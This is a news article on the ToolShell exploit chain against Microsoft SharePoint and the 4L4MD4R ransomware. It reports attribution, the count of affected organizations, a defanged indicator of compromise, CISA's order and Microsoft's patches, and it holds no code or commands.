**Ransomware Gangs Join Forces to Target Microsoft SharePoint Servers**

A recent surge in attacks has seen ransomware gangs joining forces with other malicious actors to target a vulnerability chain in Microsoft SharePoint servers. The ToolShell exploit chain, which has already breached at least 148 organizations worldwide, has been linked to Chinese threat actors and has resulted in the breach of numerous high-profile targets.

According to security researchers at Palo Alto Networks' Unit 42, a new ransomware variant dubbed 4L4MD4R was discovered in July. The malware loader, which downloads and executes the ransomware from theinnovationfactory[.]it (145.239.97[.]206) domain, was spotted following a failed exploitation attempt that revealed malicious PowerShell commands designed to disable security monitoring on the targeted device.

**The 4L4MD4R Ransomware Variant**

Analysis of the 4L4MD4R payload revealed that it is UPX-packed and written in GoLang. Upon execution, the sample decrypts an AES-encrypted payload in memory, allocates memory to load the decrypted PE file, and creates a new thread to execute it. The ransomware encrypts files on the compromised system and demands a payment of 0.005 Bitcoin, generating ransom notes and encrypted file lists on infected systems.

**Microsoft and Google Link ToolShell Attacks to Chinese Threat Actors**

Microsoft security researchers have named three separate state-backed hacking groups: Linen Typhoon, Violet Typhoon, and Storm-2603. These groups are believed to be responsible for the ToolShell attacks, which have compromised numerous high-profile targets, including the U.S. National Nuclear Security Administration, the Department of Education, Florida's Department of Revenue, and government networks in Europe and the Middle East.

**The Scope of the Attacks**

Dutch cybersecurity firm Eye Security first detected ToolShell exploitation targeting CVE-2025-49706 and CVE-2025-49704 in zero-day attacks, initially identifying 54 compromised organizations, including government entities and multinational companies. Check Point Research subsequently revealed exploitation signs dating to July 7, targeting government, telecommunications, and technology organizations across North America and Western Europe.

**The True Scope of the Attacks**

According to Eye Security Chief Technology Officer Piet Kerkhofs, the actual scope extends far beyond initial estimates, with the firm's data indicating that the attackers have infected at least 400 servers with malware across the networks of at least 148 organizations, many of which have been compromised for extended periods.

**CISA Orders Federal Agencies to Secure Their Systems**

The Cybersecurity and Infrastructure Security Agency (CISA) has added the CVE-2025-53770 remote code execution vulnerability, part of the ToolShell exploit chain, to its catalog of exploited flaws and ordered federal agencies to secure their systems within 24 hours.

**Microsoft Releases Emergency Patches for SharePoint RCE Flaws**

In response to the ongoing attacks, Microsoft has released emergency patches for the CVE-2025-53770 and CVE-2025-53771 remote code execution vulnerabilities. These patches are available through the Microsoft Update Catalog and can help protect organizations from exploitation by the ToolShell attackers.

**Conclusion**

The recent surge in ToolShell attacks highlights the importance of keeping software up to date and patching vulnerabilities as soon as they are discovered. Organizations must take immediate action to secure their systems and prevent further breaches. The fact that 400 servers have already been infected with malware across at least 148 organizations is a stark reminder of the need for robust cybersecurity measures.